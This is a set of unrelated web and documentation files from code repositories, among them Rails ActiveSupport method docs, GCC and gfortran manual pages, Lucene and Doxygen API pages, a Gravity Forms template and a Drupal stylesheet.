<pre><span class="ruby-comment"># File /Users/aaron/.rvm/gems/ruby-2.0.0-head/gems/activesupport-4.0.0/lib/active_support/core_ext/date_and_time/calculations.rb, line 54</span>
<span class="ruby-keyword">def</span> <span class="ruby-keyword ruby-title">weeks_since</span>(<span class="ruby-identifier">weeks</span>)
<span class="ruby-identifier">advance</span>(<span class="ruby-value">:weeks</span> =<span class="ruby-operator">></span> <span class="ruby-identifier">weeks</span>)
<span class="ruby-keyword">end</span></pre>
</div>
</div>
</div>
<div class="method">
<div class="title method-title" id="method-i-years_ago">
<b>years_ago</b>(years)
<a href="../../classes/DateAndTime/Calculations.html#method-i-years_ago" name="method-i-years_ago" class="permalink">Link</a>
</div>
<div class="description">
<p>Returns a new date/time the specified number of years ago.</p>
</div>
<div class="sourcecode">
<p class="source-link">
Source:
<a href="javascript:toggleSource('method-i-years_ago_source')" id="l_method-i-years_ago_source">show</a>
</p>
<div id="method-i-years_ago_source" class="dyn-source">
<pre><span class="ruby-comment"># File /Users/aaron/.rvm/gems/ruby-2.0.0-head/gems/activesupport-4.0.0/lib/active_support/core_ext/date_and_time/calculations.rb, line 69</span>
<span class="ruby-keyword">def</span> <span class="ruby-keyword ruby-title">years_ago</span>(<span class="ruby-identifier">years</span>)
<span class="ruby-identifier">advance</span>(<span class="ruby-value">:years</span> =<span class="ruby-operator">></span> <span class="ruby-operator">-</span><span class="ruby-identifier">years</span>)
<span class="ruby-keyword">end</span></pre>
</div>
</div>
</div>
<div class="method">
<div class="title method-title" id="method-i-years_since">
<b>years_since</b>(years)
<a href="../../classes/DateAndTime/Calculations.html#method-i-years_since" name="method-i-years_since" class="permalink">Link</a>
</div>
<div class="description">
<p>Returns a new date/time the specified number of years in the future.</p>
</div>
<div class="sourcecode">
<p class="source-link">
Source:
<a href="javascript:toggleSource('method-i-years_since_source')" id="l_method-i-years_since_source">show</a>
</p>
<div id="method-i-years_since_source" class="dyn-source">
<pre><span class="ruby-comment"># File /Users/aaron/.rvm/gems/ruby-2.0.0-head/gems/activesupport-4.0.0/lib/active_support/core_ext/date_and_time/calculations.rb, line 74</span>
<span class="ruby-keyword">def</span> <span class="ruby-keyword ruby-title">years_since</span>(<span class="ruby-identifier">years</span>)
<span class="ruby-identifier">advance</span>(<span class="ruby-value">:years</span> =<span class="ruby-operator">></span> <span class="ruby-identifier">years</span>)
<span class="ruby-keyword">end</span></pre>
</div>
</div>
</div>
<div class="method">
<div class="title method-title" id="method-i-yesterday">
<b>yesterday</b>()
<a href="../../classes/DateAndTime/Calculations.html#method-i-yesterday" name="method-i-yesterday" class="permalink">Link</a>
</div>
<div class="description">
<p>Returns a new date/time representing yesterday.</p>
</div>
<div class="sourcecode">
<p class="source-link">
Source:
<a href="javascript:toggleSource('method-i-yesterday_source')" id="l_method-i-yesterday_source">show</a>
</p>
<div id="method-i-yesterday_source" class="dyn-source">
<pre><span class="ruby-comment"># File /Users/aaron/.rvm/gems/ruby-2.0.0-head/gems/activesupport-4.0.0/lib/active_support/core_ext/date_and_time/calculations.rb, line 14</span>
<span class="ruby-keyword">def</span> <span class="ruby-keyword ruby-title">yesterday</span>
<span class="ruby-identifier">advance</span>(<span class="ruby-value">:days</span> =<span class="ruby-operator">></span> <span class="ruby-number">-1</span>)
<span class="ruby-keyword">end</span></pre>
</div>
</div>
</div>
</div>
</div>
</body>
</html> |
wp-content/plugins/gravityforms/js/components/form_editor/conditional_flyout/views/flyout.html | MinnPost/minnpost-wordpress | <aside class="conditional_logic_flyout">
<button class="conditional_logic_flyout__close" data-js-close-flyout>
<span class="screen-reader-text">Close Conditional Logic Settings Modal</span>
<i class="conditional_logic_flyout__close_icon" data-js-close-flyout ></i>
</button>
<header class="conditional_logic_flyout__head">
<div class="conditional_logic_flyout__title">
{{ configure }} {{ conditionalLogic }}
</div>
<div class="conditional_logic_flyout__desc">
{{ desc }}
</div>
</header>
<article class="conditional_logic_flyout__body panel-block-tabs__body--settings" data-js="gform-simplebar">
<div class="conditional_logic_flyout__toggle">
<span class="conditional_logic_flyout__toggle_label">
{{ enable }} {{ conditionalLogic }}
</span>
<div class="conditional_logic_flyout__toggle_input gform-field__toggle">
<span class="gform-settings-input__container">
<input type="checkbox" class="gform-field__toggle-input" data-js-conditonal-toggle id="field_conditional_logic_{{ objectType }}_{{ fieldId }}" {{ checked }}>
<label class="gform-field__toggle-container" for="field_conditional_logic_{{ objectType }}_{{ fieldId }}">
<span class="gform-field__toggle-switch-text screen-reader-text">{{ enabledText }}</span>
<span class="gform-field__toggle-switch"></span>
</label>
</span>
</div>
</div>
<div class="conditional_logic_flyout__main">
{{ main }}
</div>
</article>
</aside>
|
doc/html/structifbpstpconf.html | diy19901030/lldpd | <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/xhtml;charset=UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=9"/>
<title>lldp: ifbpstpconf Struct Reference</title>
<link href="tabs.css" rel="stylesheet" type="text/css"/>
<link href="doxygen.css" rel="stylesheet" type="text/css" />
</head>
<body>
<div id="top"><!-- do not remove this div! -->
<div id="titlearea">
<table cellspacing="0" cellpadding="0">
<tbody>
<tr style="height: 56px;">
<td style="padding-left: 0.5em;">
<div id="projectname">lldp
 <span id="projectnumber">0.7.11</span>
</div>
</td>
</tr>
</tbody>
</table>
</div>
<!-- Generated by Doxygen 1.7.6.1 -->
<div id="navrow1" class="tabs">
<ul class="tablist">
<li><a href="index.html"><span>Main Page</span></a></li>
<li><a href="pages.html"><span>Related Pages</span></a></li>
<li><a href="modules.html"><span>Modules</span></a></li>
<li class="current"><a href="annotated.html"><span>Data Structures</span></a></li>
<li><a href="files.html"><span>Files</span></a></li>
</ul>
</div>
<div id="navrow2" class="tabs2">
<ul class="tablist">
<li><a href="annotated.html"><span>Data Structures</span></a></li>
<li><a href="classes.html"><span>Data Structure Index</span></a></li>
<li><a href="inherits.html"><span>Class Hierarchy</span></a></li>
<li><a href="functions.html"><span>Data Fields</span></a></li>
</ul>
</div>
</div>
<div class="header">
<div class="summary">
<a href="#pub-attribs">Data Fields</a> </div>
<div class="headertitle">
<div class="title">ifbpstpconf Struct Reference</div> </div>
</div><!--header-->
<div class="contents">
<!-- doxytag: class="ifbpstpconf" --><div class="dynheader">
Collaboration diagram for ifbpstpconf:</div>
<div class="dyncontent">
<div class="center"><img src="structifbpstpconf__coll__graph.png" border="0" usemap="#ifbpstpconf_coll__map" alt="Collaboration graph"/></div>
<map name="ifbpstpconf_coll__map" id="ifbpstpconf_coll__map">
</map>
<center><span class="legend">[<a href="graph_legend.html">legend</a>]</span></center></div>
<table class="memberdecls">
<tr><td colspan="2"><h2><a name="pub-attribs"></a>
Data Fields</h2></td></tr>
<tr><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="a4ac1e98db3ff8c9b2a3de0dbba608d04"></a><!-- doxytag: member="ifbpstpconf::ifbpstp_len" ref="a4ac1e98db3ff8c9b2a3de0dbba608d04" args="" -->
uint32_t </td><td class="memItemRight" valign="bottom"><b>ifbpstp_len</b></td></tr>
<tr><td class="memItemLeft" ><a class="anchor" id="aa455bf6461541f7043063efd1808bb15"></a><!-- doxytag: member="ifbpstpconf::ifbpstp_ifbpstpu" ref="aa455bf6461541f7043063efd1808bb15" args="" -->
union {</td></tr>
<tr><td class="memItemLeft" >   caddr_t   <b>ifbpstpu_buf</b></td></tr>
<tr><td class="memItemLeft" >   struct <a class="el" href="structifbpstpreq.html">ifbpstpreq</a> *   <b>ifbpstpu_req</b></td></tr>
<tr><td class="memItemLeft" valign="top">} </td><td class="memItemRight" valign="bottom"><b>ifbpstp_ifbpstpu</b></td></tr>
</table>
<hr/>The documentation for this struct was generated from the following file:<ul>
<li>/home/evan/lldpd-0.7.11/include/osx/<a class="el" href="if__bridgevar_8h_source.html">if_bridgevar.h</a></li>
</ul>
</div><!-- contents -->
<hr class="footer"/><address class="footer"><small>
Generated on Mon Nov 17 2014 22:16:08 for lldp by  <a href="http://www.doxygen.org/index.html">
<img class="footer" src="doxygen.png" alt="doxygen"/>
</a> 1.7.6.1
</small></address>
</body>
</html>
|
toolchain/arm_cm0/share/doc/gcc-arm-none-eabi/html/gcc/Half_002dPrecision.html | jocelynmass/nrf51 | <html lang="en">
<head>
<title>Half-Precision - Using the GNU Compiler Collection (GCC)</title>
<meta http-equiv="Content-Type" content="text/html">
<meta name="description" content="Using the GNU Compiler Collection (GCC)">
<meta name="generator" content="makeinfo 4.8">
<link title="Top" rel="start" href="index.html#Top">
<link rel="up" href="C-Extensions.html#C-Extensions" title="C Extensions">
<link rel="prev" href="Floating-Types.html#Floating-Types" title="Floating Types">
<link rel="next" href="Decimal-Float.html#Decimal-Float" title="Decimal Float">
<link href="http://www.gnu.org/software/texinfo/" rel="generator-home" title="Texinfo Homepage">
<!--
Copyright (C) 1988-2017 Free Software Foundation, Inc.
Permission is granted to copy, distribute and/or modify this document
under the terms of the GNU Free Documentation License, Version 1.3 or
any later version published by the Free Software Foundation; with the
Invariant Sections being ``Funding Free Software'', the Front-Cover
Texts being (a) (see below), and with the Back-Cover Texts being (b)
(see below). A copy of the license is included in the section entitled
``GNU Free Documentation License''.
(a) The FSF's Front-Cover Text is:
A GNU Manual
(b) The FSF's Back-Cover Text is:
You have freedom to copy and modify this GNU Manual, like GNU
software. Copies published by the Free Software Foundation raise
funds for GNU development.-->
<meta http-equiv="Content-Style-Type" content="text/css">
<style type="text/css"><!--
pre.display { font-family:inherit }
pre.format { font-family:inherit }
pre.smalldisplay { font-family:inherit; font-size:smaller }
pre.smallformat { font-family:inherit; font-size:smaller }
pre.smallexample { font-size:smaller }
pre.smalllisp { font-size:smaller }
span.sc { font-variant:small-caps }
span.roman { font-family:serif; font-weight:normal; }
span.sansserif { font-family:sans-serif; font-weight:normal; }
--></style>
</head>
<body>
<div class="node">
<p>
<a name="Half-Precision"></a>
<a name="Half_002dPrecision"></a>
Next: <a rel="next" accesskey="n" href="Decimal-Float.html#Decimal-Float">Decimal Float</a>,
Previous: <a rel="previous" accesskey="p" href="Floating-Types.html#Floating-Types">Floating Types</a>,
Up: <a rel="up" accesskey="u" href="C-Extensions.html#C-Extensions">C Extensions</a>
<hr>
</div>
<h3 class="section">6.12 Half-Precision Floating Point</h3>
<p><a name="index-half_002dprecision-floating-point-3151"></a><a name="index-g_t_0040code_007b_005f_005ffp16_007d-data-type-3152"></a>
On ARM and AArch64 targets, GCC supports half-precision (16-bit) floating
point via the <code>__fp16</code> type defined in the ARM C Language Extensions.
On ARM systems, you must enable this type explicitly with the
<samp><span class="option">-mfp16-format</span></samp> command-line option in order to use it.
<p>ARM targets support two incompatible representations for half-precision
floating-point values. You must choose one of the representations and
use it consistently in your program.
<p>Specifying <samp><span class="option">-mfp16-format=ieee</span></samp> selects the IEEE 754-2008 format.
This format can represent normalized values in the range of 2^-14 to 65504.
There are 11 bits of significand precision, approximately 3
decimal digits.
<p>Specifying <samp><span class="option">-mfp16-format=alternative</span></samp> selects the ARM
alternative format. This representation is similar to the IEEE
format, but does not support infinities or NaNs. Instead, the range
of exponents is extended, so that this format can represent normalized
values in the range of 2^-14 to 131008.
<p>The GCC port for AArch64 only supports the IEEE 754-2008 format, and does
not require use of the <samp><span class="option">-mfp16-format</span></samp> command-line option.
<p>The <code>__fp16</code> type may only be used as an argument to intrinsics defined
in <code><arm_fp16.h></code>, or as a storage format. For purposes of
arithmetic and other operations, <code>__fp16</code> values in C or C++
expressions are automatically promoted to <code>float</code>.
<p>The ARM target provides hardware support for conversions between
<code>__fp16</code> and <code>float</code> values
as an extension to VFP and NEON (Advanced SIMD), and from ARMv8 provides
hardware support for conversions between <code>__fp16</code> and <code>double</code>
values. GCC generates code using these hardware instructions if you
compile with options to select an FPU that provides them;
for example, <samp><span class="option">-mfpu=neon-fp16 -mfloat-abi=softfp</span></samp>,
in addition to the <samp><span class="option">-mfp16-format</span></samp> option to select
a half-precision format.
<p>Language-level support for the <code>__fp16</code> data type is
independent of whether GCC generates code using hardware floating-point
instructions. In cases where hardware support is not specified, GCC
implements conversions between <code>__fp16</code> and other types as library
calls.
<p>It is recommended that portable code use the <code>_Float16</code> type defined
by ISO/IEC TS 18661-3:2015. See <a href="Floating-Types.html#Floating-Types">Floating Types</a>.
</body></html>
|
lucene-5.1.0/docs/analyzers-common/org/apache/lucene/analysis/util/class-use/CharacterUtils.CharacterBuffer.html | marcialhernandez/TecnologiasWeb | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!-- NewPage -->
<html lang="en">
<head>
<!-- Generated by javadoc (version 1.7.0_67) on Thu Apr 09 10:31:52 MDT 2015 -->
<meta http-equiv="Content-Type" content="text/html" charset="utf-8">
<title>Uses of Class org.apache.lucene.analysis.util.CharacterUtils.CharacterBuffer (Lucene 5.1.0 API)</title>
<meta name="date" content="2015-04-09">
<link rel="stylesheet" type="text/css" href="../../../../../../stylesheet.css" title="Style">
</head>
<body>
<script type="text/javascript"><!--
if (location.href.indexOf('is-external=true') == -1) {
parent.document.title="Uses of Class org.apache.lucene.analysis.util.CharacterUtils.CharacterBuffer (Lucene 5.1.0 API)";
}
//-->
</script>
<noscript>
<div>JavaScript is disabled on your browser.</div>
</noscript>
<!-- ========= START OF TOP NAVBAR ======= -->
<div class="topNav"><a name="navbar_top">
<!-- -->
</a><a href="#skip-navbar_top" title="Skip navigation links"></a><a name="navbar_top_firstrow">
<!-- -->
</a>
<ul class="navList" title="Navigation">
<li><a href="../../../../../../overview-summary.html">Overview</a></li>
<li><a href="../package-summary.html">Package</a></li>
<li><a href="../../../../../../org/apache/lucene/analysis/util/CharacterUtils.CharacterBuffer.html" title="class in org.apache.lucene.analysis.util">Class</a></li>
<li class="navBarCell1Rev">Use</li>
<li><a href="../package-tree.html">Tree</a></li>
<li><a href="../../../../../../deprecated-list.html">Deprecated</a></li>
<li><a href="../../../../../../help-doc.html">Help</a></li>
</ul>
</div>
<div class="subNav">
<ul class="navList">
<li>Prev</li>
<li>Next</li>
</ul>
<ul class="navList">
<li><a href="../../../../../../index.html?org/apache/lucene/analysis/util/class-use/CharacterUtils.CharacterBuffer.html" target="_top">Frames</a></li>
<li><a href="CharacterUtils.CharacterBuffer.html" target="_top">No Frames</a></li>
</ul>
<ul class="navList" id="allclasses_navbar_top">
<li><a href="../../../../../../allclasses-noframe.html">All Classes</a></li>
</ul>
<div>
<script type="text/javascript"><!--
allClassesLink = document.getElementById("allclasses_navbar_top");
if(window==top) {
allClassesLink.style.display = "block";
}
else {
allClassesLink.style.display = "none";
}
//-->
</script>
</div>
<a name="skip-navbar_top">
<!-- -->
</a></div>
<!-- ========= END OF TOP NAVBAR ========= -->
<div class="header">
<h2 title="Uses of Class org.apache.lucene.analysis.util.CharacterUtils.CharacterBuffer" class="title">Uses of Class<br>org.apache.lucene.analysis.util.CharacterUtils.CharacterBuffer</h2>
</div>
<div class="classUseContainer">
<ul class="blockList">
<li class="blockList">
<table border="0" cellpadding="3" cellspacing="0" summary="Use table, listing packages, and an explanation">
<caption><span>Packages that use <a href="../../../../../../org/apache/lucene/analysis/util/CharacterUtils.CharacterBuffer.html" title="class in org.apache.lucene.analysis.util">CharacterUtils.CharacterBuffer</a></span><span class="tabEnd"> </span></caption>
<tr>
<th class="colFirst" scope="col">Package</th>
<th class="colLast" scope="col">Description</th>
</tr>
<tbody>
<tr class="altColor">
<td class="colFirst"><a href="#org.apache.lucene.analysis.util">org.apache.lucene.analysis.util</a></td>
<td class="colLast">
<div class="block">Utility functions for text analysis.</div>
</td>
</tr>
</tbody>
</table>
</li>
<li class="blockList">
<ul class="blockList">
<li class="blockList"><a name="org.apache.lucene.analysis.util">
<!-- -->
</a>
<h3>Uses of <a href="../../../../../../org/apache/lucene/analysis/util/CharacterUtils.CharacterBuffer.html" title="class in org.apache.lucene.analysis.util">CharacterUtils.CharacterBuffer</a> in <a href="../../../../../../org/apache/lucene/analysis/util/package-summary.html">org.apache.lucene.analysis.util</a></h3>
<table border="0" cellpadding="3" cellspacing="0" summary="Use table, listing methods, and an explanation">
<caption><span>Methods in <a href="../../../../../../org/apache/lucene/analysis/util/package-summary.html">org.apache.lucene.analysis.util</a> that return <a href="../../../../../../org/apache/lucene/analysis/util/CharacterUtils.CharacterBuffer.html" title="class in org.apache.lucene.analysis.util">CharacterUtils.CharacterBuffer</a></span><span class="tabEnd"> </span></caption>
<tr>
<th class="colFirst" scope="col">Modifier and Type</th>
<th class="colLast" scope="col">Method and Description</th>
</tr>
<tbody>
<tr class="altColor">
<td class="colFirst"><code>static <a href="../../../../../../org/apache/lucene/analysis/util/CharacterUtils.CharacterBuffer.html" title="class in org.apache.lucene.analysis.util">CharacterUtils.CharacterBuffer</a></code></td>
<td class="colLast"><span class="strong">CharacterUtils.</span><code><strong><a href="../../../../../../org/apache/lucene/analysis/util/CharacterUtils.html#newCharacterBuffer(int)">newCharacterBuffer</a></strong>(int bufferSize)</code>
<div class="block">Creates a new <a href="../../../../../../org/apache/lucene/analysis/util/CharacterUtils.CharacterBuffer.html" title="class in org.apache.lucene.analysis.util"><code>CharacterUtils.CharacterBuffer</code></a> and allocates a <code>char[]</code>
of the given bufferSize.</div>
</td>
</tr>
</tbody>
</table>
<table border="0" cellpadding="3" cellspacing="0" summary="Use table, listing methods, and an explanation">
<caption><span>Methods in <a href="../../../../../../org/apache/lucene/analysis/util/package-summary.html">org.apache.lucene.analysis.util</a> with parameters of type <a href="../../../../../../org/apache/lucene/analysis/util/CharacterUtils.CharacterBuffer.html" title="class in org.apache.lucene.analysis.util">CharacterUtils.CharacterBuffer</a></span><span class="tabEnd"> </span></caption>
<tr>
<th class="colFirst" scope="col">Modifier and Type</th>
<th class="colLast" scope="col">Method and Description</th>
</tr>
<tbody>
<tr class="altColor">
<td class="colFirst"><code>boolean</code></td>
<td class="colLast"><span class="strong">CharacterUtils.</span><code><strong><a href="../../../../../../org/apache/lucene/analysis/util/CharacterUtils.html#fill(org.apache.lucene.analysis.util.CharacterUtils.CharacterBuffer,%20java.io.Reader)">fill</a></strong>(<a href="../../../../../../org/apache/lucene/analysis/util/CharacterUtils.CharacterBuffer.html" title="class in org.apache.lucene.analysis.util">CharacterUtils.CharacterBuffer</a> buffer,
<a href="http://download.oracle.com/javase/7/docs/api/java/io/Reader.html?is-external=true" title="class or interface in java.io">Reader</a> reader)</code>
<div class="block">Convenience method which calls <code>fill(buffer, reader, buffer.buffer.length)</code>.</div>
</td>
</tr>
<tr class="rowColor">
<td class="colFirst"><code>abstract boolean</code></td>
<td class="colLast"><span class="strong">CharacterUtils.</span><code><strong><a href="../../../../../../org/apache/lucene/analysis/util/CharacterUtils.html#fill(org.apache.lucene.analysis.util.CharacterUtils.CharacterBuffer,%20java.io.Reader,%20int)">fill</a></strong>(<a href="../../../../../../org/apache/lucene/analysis/util/CharacterUtils.CharacterBuffer.html" title="class in org.apache.lucene.analysis.util">CharacterUtils.CharacterBuffer</a> buffer,
<a href="http://download.oracle.com/javase/7/docs/api/java/io/Reader.html?is-external=true" title="class or interface in java.io">Reader</a> reader,
int numChars)</code>
<div class="block">Fills the <a href="../../../../../../org/apache/lucene/analysis/util/CharacterUtils.CharacterBuffer.html" title="class in org.apache.lucene.analysis.util"><code>CharacterUtils.CharacterBuffer</code></a> with characters read from the given
reader <a href="http://download.oracle.com/javase/7/docs/api/java/io/Reader.html?is-external=true" title="class or interface in java.io"><code>Reader</code></a>.</div>
</td>
</tr>
</tbody>
</table>
</li>
</ul>
</li>
</ul>
</div>
<!-- ======= START OF BOTTOM NAVBAR ====== -->
<div class="bottomNav"><a name="navbar_bottom">
<!-- -->
</a><a href="#skip-navbar_bottom" title="Skip navigation links"></a><a name="navbar_bottom_firstrow">
<!-- -->
</a>
<ul class="navList" title="Navigation">
<li><a href="../../../../../../overview-summary.html">Overview</a></li>
<li><a href="../package-summary.html">Package</a></li>
<li><a href="../../../../../../org/apache/lucene/analysis/util/CharacterUtils.CharacterBuffer.html" title="class in org.apache.lucene.analysis.util">Class</a></li>
<li class="navBarCell1Rev">Use</li>
<li><a href="../package-tree.html">Tree</a></li>
<li><a href="../../../../../../deprecated-list.html">Deprecated</a></li>
<li><a href="../../../../../../help-doc.html">Help</a></li>
</ul>
</div>
<div class="subNav">
<ul class="navList">
<li>Prev</li>
<li>Next</li>
</ul>
<ul class="navList">
<li><a href="../../../../../../index.html?org/apache/lucene/analysis/util/class-use/CharacterUtils.CharacterBuffer.html" target="_top">Frames</a></li>
<li><a href="CharacterUtils.CharacterBuffer.html" target="_top">No Frames</a></li>
</ul>
<ul class="navList" id="allclasses_navbar_bottom">
<li><a href="../../../../../../allclasses-noframe.html">All Classes</a></li>
</ul>
<div>
<script type="text/javascript"><!--
allClassesLink = document.getElementById("allclasses_navbar_bottom");
if(window==top) {
allClassesLink.style.display = "block";
}
else {
allClassesLink.style.display = "none";
}
//-->
</script>
</div>
<a name="skip-navbar_bottom">
<!-- -->
</a></div>
<!-- ======== END OF BOTTOM NAVBAR ======= -->
<p class="legalCopy"><small>
<i>Copyright © 2000-2015 Apache Software Foundation. All Rights Reserved.</i>
<script src='../../../../../../prettify.js' type='text/javascript'></script>
<script type='text/javascript'>
(function(){
var oldonload = window.onload;
if (typeof oldonload != 'function') {
window.onload = prettyPrint;
} else {
window.onload = function() {
oldonload();
prettyPrint();
}
}
})();
</script>
</small></p>
</body>
</html>
|
gcc-linaro/share/doc/gfortran/Directory-Options.html | SubhrajyotiSen/HelioxKernelHarpia | <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<!-- Copyright (C) 1999-2016 Free Software Foundation, Inc.
Permission is granted to copy, distribute and/or modify this document
under the terms of the GNU Free Documentation License, Version 1.3 or
any later version published by the Free Software Foundation; with the
Invariant Sections being "Funding Free Software", the Front-Cover
Texts being (a) (see below), and with the Back-Cover Texts being (b)
(see below). A copy of the license is included in the section entitled
"GNU Free Documentation License".
(a) The FSF's Front-Cover Text is:
A GNU Manual
(b) The FSF's Back-Cover Text is:
You have freedom to copy and modify this GNU Manual, like GNU
software. Copies published by the Free Software Foundation raise
funds for GNU development. -->
<!-- Created by GNU Texinfo 5.2, http://www.gnu.org/software/texinfo/ -->
<head>
<title>The GNU Fortran Compiler: Directory Options</title>
<meta name="description" content="The GNU Fortran Compiler: Directory Options">
<meta name="keywords" content="The GNU Fortran Compiler: Directory Options">
<meta name="resource-type" content="document">
<meta name="distribution" content="global">
<meta name="Generator" content="makeinfo">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<link href="index.html#Top" rel="start" title="Top">
<link href="Option-Index.html#Option-Index" rel="index" title="Option Index">
<link href="index.html#SEC_Contents" rel="contents" title="Table of Contents">
<link href="Invoking-GNU-Fortran.html#Invoking-GNU-Fortran" rel="up" title="Invoking GNU Fortran">
<link href="Link-Options.html#Link-Options" rel="next" title="Link Options">
<link href="Debugging-Options.html#Debugging-Options" rel="prev" title="Debugging Options">
<style type="text/css">
<!--
a.summary-letter {text-decoration: none}
blockquote.smallquotation {font-size: smaller}
div.display {margin-left: 3.2em}
div.example {margin-left: 3.2em}
div.indentedblock {margin-left: 3.2em}
div.lisp {margin-left: 3.2em}
div.smalldisplay {margin-left: 3.2em}
div.smallexample {margin-left: 3.2em}
div.smallindentedblock {margin-left: 3.2em; font-size: smaller}
div.smalllisp {margin-left: 3.2em}
kbd {font-style:oblique}
pre.display {font-family: inherit}
pre.format {font-family: inherit}
pre.menu-comment {font-family: serif}
pre.menu-preformatted {font-family: serif}
pre.smalldisplay {font-family: inherit; font-size: smaller}
pre.smallexample {font-size: smaller}
pre.smallformat {font-family: inherit; font-size: smaller}
pre.smalllisp {font-size: smaller}
span.nocodebreak {white-space:nowrap}
span.nolinebreak {white-space:nowrap}
span.roman {font-family:serif; font-weight:normal}
span.sansserif {font-family:sans-serif; font-weight:normal}
ul.no-bullet {list-style: none}
-->
</style>
</head>
<body lang="en" bgcolor="#FFFFFF" text="#000000" link="#0000FF" vlink="#800080" alink="#FF0000">
<a name="Directory-Options"></a>
<div class="header">
<p>
Next: <a href="Link-Options.html#Link-Options" accesskey="n" rel="next">Link Options</a>, Previous: <a href="Debugging-Options.html#Debugging-Options" accesskey="p" rel="prev">Debugging Options</a>, Up: <a href="Invoking-GNU-Fortran.html#Invoking-GNU-Fortran" accesskey="u" rel="up">Invoking GNU Fortran</a> [<a href="index.html#SEC_Contents" title="Table of contents" rel="contents">Contents</a>][<a href="Option-Index.html#Option-Index" title="Index" rel="index">Index</a>]</p>
</div>
<hr>
<a name="Options-for-directory-search"></a>
<h3 class="section">2.6 Options for directory search</h3>
<a name="index-directory_002c-options"></a>
<a name="index-options_002c-directory-search"></a>
<a name="index-search-path"></a>
<a name="index-INCLUDE-directive"></a>
<a name="index-directive_002c-INCLUDE"></a>
<p>These options affect how GNU Fortran searches
for files specified by the <code>INCLUDE</code> directive and where it searches
for previously compiled modules.
</p>
<p>It also affects the search paths used by <code>cpp</code> when used to preprocess
Fortran source.
</p>
<dl compact="compact">
<dt><code>-I<var>dir</var></code></dt>
<dd><a name="index-Idir"></a>
<a name="index-directory_002c-search-paths-for-inclusion"></a>
<a name="index-inclusion_002c-directory-search-paths-for"></a>
<a name="index-search-paths_002c-for-included-files"></a>
<a name="index-paths_002c-search"></a>
<a name="index-module-search-path"></a>
<p>These affect interpretation of the <code>INCLUDE</code> directive
(as well as of the <code>#include</code> directive of the <code>cpp</code>
preprocessor).
</p>
<p>Also note that the general behavior of <samp>-I</samp> and
<code>INCLUDE</code> is pretty much the same as of <samp>-I</samp> with
<code>#include</code> in the <code>cpp</code> preprocessor, with regard to
looking for <samp>header.gcc</samp> files and other such things.
</p>
<p>This path is also used to search for <samp>.mod</samp> files when previously
compiled modules are required by a <code>USE</code> statement.
</p>
<p>See <a href="http://gcc.gnu.org/onlinedocs/gcc/Directory-Options.html#Directory-Options">Options for Directory Search</a> in <cite>Using the GNU Compiler Collection (GCC)</cite>, for information on the
<samp>-I</samp> option.
</p>
</dd>
<dt><code>-J<var>dir</var></code></dt>
<dd><a name="index-Jdir"></a>
<a name="index-Mdir"></a>
<a name="index-paths_002c-search-1"></a>
<a name="index-module-search-path-1"></a>
<p>This option specifies where to put <samp>.mod</samp> files for compiled modules.
It is also added to the list of directories to searched by an <code>USE</code>
statement.
</p>
<p>The default is the current directory.
</p>
</dd>
<dt><code>-fintrinsic-modules-path <var>dir</var></code></dt>
<dd><a name="index-fintrinsic_002dmodules_002dpath-dir"></a>
<a name="index-paths_002c-search-2"></a>
<a name="index-module-search-path-2"></a>
<p>This option specifies the location of pre-compiled intrinsic modules, if
they are not in the default location expected by the compiler.
</p></dd>
</dl>
</body>
</html>
|
blakearchive/static/html/comment.html | blakearchive/archive | <!--<div class="col-sm-9 col-sm-offset-3 content-right-column">-->
<div class="row">
<div class="col-sm-10">
<!--<h2 class="title">User Comments</h2>-->
<table align="center" border="0" cellpadding="0" cellspacing="8" width="50%">
<tbody>
<tr align="left" valign="top">
<td colspan="2" align="left" valign="top">
<p>The William Blake Archive welcomes any comments or suggestions
you may have.</p>
<p>If you are writing with a specific
question or request, we encourage you to consult our list
of <a href="./about/faq/index.html">Frequently Asked
Questions</a>.</p>
<p class="c2">If you are writing to request
permission to reproduce an image or a transcription, please email us: <a href="mailto:grantg@live.unc.edu">grantg@live.unc.edu</a>.
We can only grant permission to reproduce Archive materials; please do
not contact us regarding materials not present in the Archive.</b></p>
<p class="c2">Finally, please be certain to sign
your comments with a valid return email address, included in the <strong>body</strong>—and not just the header—of your message; if you do
not receive a
reply to a question or comment, it's because we've been unable to
contact you.</p>
<p>
<div class="c3"> <span class="c1"><a href="mailto:grantg@live.unc.edu"><strong>Send Us
Your Comments</strong></a></span> </div>
</p>
</td>
</tr>
</tbody>
</table>
</div>
</div>
<!--</div>--> |
sites/all/modules/drupal_wall/css/drupal_wall.css | katel/datatales | /**
* @file
* Styles sheet for the Drupal wall module.
*/
/* @group drupal_wall class */
.drupal_wall_post_status {
background-color: white;
-webkit-border-radius: 3px;
-moz-border-radius: 3px;
-ms-border-radius: 3px;
-o-border-radius: 3px;
border-radius: 3px;
-webkit-box-shadow: #858585 1px 1px 4px;
-moz-box-shadow: #858585 1px 1px 4px;
box-shadow: #858585 1px 1px 4px;
margin: 10px 0 20px;
padding: 20px 20px 15px 20px;
}
.drupal_wall_outer {
float: left;
margin-bottom: 20px;
padding: 0px 0 0 10px;
width: 100%;
background-color: white;
-webkit-border-radius: 3px;
-moz-border-radius: 3px;
-ms-border-radius: 3px;
-o-border-radius: 3px;
border-radius: 3px;
-webkit-box-shadow: #858585 1px 1px 4px;
-moz-box-shadow: #858585 1px 1px 4px;
box-shadow: #858585 1px 1px 4px;
width: 98%;
}
.drupal_wall {
color: #000;
font-family: 'lucida grande',tahoma,verdana,arial,sans-serif;
font-size: 11px;
line-height: 1.38;
font-weight: normal;
height: auto;
float: left;
margin: 10px;
padding: 0px 0px 10px 0px;
border-bottom: 1px solid lightgray;
width: 95%;
position: relative;
}
.drupal_wall a {
text-decoration: none;
}
.drupal_wall img {
background: white;
display: inline-block;
padding: 4px;
-webkit-border-radius: 3px;
-moz-border-radius: 3px;
-ms-border-radius: 3px;
-o-border-radius: 3px;
border-radius: 3px;
-webkit-box-shadow: #858585 1px 1px 4px;
-moz-box-shadow: #858585 1px 1px 4px;
box-shadow: #858585 1px 1px 4px;
max-width: 100%;
}
